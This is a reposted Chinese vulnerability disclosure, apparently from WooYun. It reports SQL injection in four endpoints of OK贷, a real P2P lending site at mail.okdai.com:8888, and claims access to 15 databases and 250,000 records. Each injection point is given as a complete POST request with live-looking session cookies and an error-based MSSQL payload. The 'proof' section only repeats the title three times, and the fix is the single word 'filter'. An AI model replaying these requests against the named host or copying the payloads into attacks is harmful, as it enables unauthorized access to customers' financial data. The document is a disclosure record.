神刀安全网

漏洞标题: P2P金融安全之OK贷某站多处SQL注入漏洞&15个库&25万数据信息

漏洞详情

披露状态:

2016-04-07: 细节已通知厂商并且等待厂商处理中
2016-04-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

P2P金融安全之OK贷某站多处sql注入漏洞&&15个库&&25万数据信息

详细说明:

注入点一:

code 区域
POST /Website/abouts/DeleteAboutsRemove HTTP/1.1
Content-Length: 180
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=lq3x5ymp2zfqfzagiddnfvwd; Hm_lvt_cac91bdc3b32aef443464f95b91a41fa=1459779037,1459779071,1459779091,1459779113; Hm_lpvt_cac91bdc3b32aef443464f95b91a41fa=1459779113; HMACCOUNT=FED91CA2363927EB; cod=; csd=96
Host: mail.okdai.com:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

param%5B0%5D=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(81)%2bCHAR(78)%2bCHAR(52)%2bCHAR(100)%2bCHAR(51)%2bCHAR(119)%2bCHAR(51)%2bCHAR(88))%20FROM%20syscolumns)

注入参数:param%5B0%5D

注入点二:

code 区域
POST /Website/Feedback/GetFeedbackList HTTP/1.1
Content-Length: 197
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=lq3x5ymp2zfqfzagiddnfvwd; Hm_lvt_cac91bdc3b32aef443464f95b91a41fa=1459779037,1459779071,1459779091,1459779113; Hm_lpvt_cac91bdc3b32aef443464f95b91a41fa=1459779113; HMACCOUNT=FED91CA2363927EB; cod=; csd=96
Host: mail.okdai.com:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

order=DESC&page=1&rows=15&sort=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(74)%2bCHAR(115)%2bCHAR(55)%2bCHAR(81)%2bCHAR(55)%2bCHAR(52)%2bCHAR(87)%2bCHAR(50))%20FROM%20syscolumns)

注入参数:sort

注入点三:

code 区域
POST /Website/Home/GetFriendDatas HTTP/1.1
Content-Length: 207
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=lq3x5ymp2zfqfzagiddnfvwd; Hm_lvt_cac91bdc3b32aef443464f95b91a41fa=1459779037,1459779071,1459779091,1459779113; Hm_lpvt_cac91bdc3b32aef443464f95b91a41fa=1459779113; HMACCOUNT=FED91CA2363927EB; cod=; csd=96
Host: mail.okdai.com:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

order=DESC&page=1&rows=15&sort=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(118)%2bCHAR(74)%2bCHAR(50)%2bCHAR(51)%2bCHAR(81)%2bCHAR(88)%2bCHAR(84)%2bCHAR(111))%20FROM%20syscolumns)&StrKey=e

注入参数:sort

注入点四:

code 区域
POST /Website/News/VidelListDetail HTTP/1.1
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=lq3x5ymp2zfqfzagiddnfvwd; Hm_lvt_cac91bdc3b32aef443464f95b91a41fa=1459779037,1459779071,1459779091,1459779113; Hm_lpvt_cac91bdc3b32aef443464f95b91a41fa=1459779113; HMACCOUNT=FED91CA2363927EB; cod=; csd=96
Host: mail.okdai.com:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

order=DESC&page=1&rows=15&sort=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(117)%2bCHAR(114)%2bCHAR(108)%2bCHAR(79)%2bCHAR(76)%2bCHAR(54)%2bCHAR(105)%2bCHAR(53))%20FROM%20syscolumns)

注入参数:sort

漏洞证明:

漏洞标题:  P2P金融安全之OK贷某站多处SQL注入漏洞&15个库&25万数据信息

漏洞标题:  P2P金融安全之OK贷某站多处SQL注入漏洞&15个库&25万数据信息

漏洞标题:  P2P金融安全之OK贷某站多处SQL注入漏洞&15个库&25万数据信息

修复方案:

过滤

版权声明:转载请注明来源 onpu@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: P2P金融安全之OK贷某站多处SQL注入漏洞&15个库&25万数据信息

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮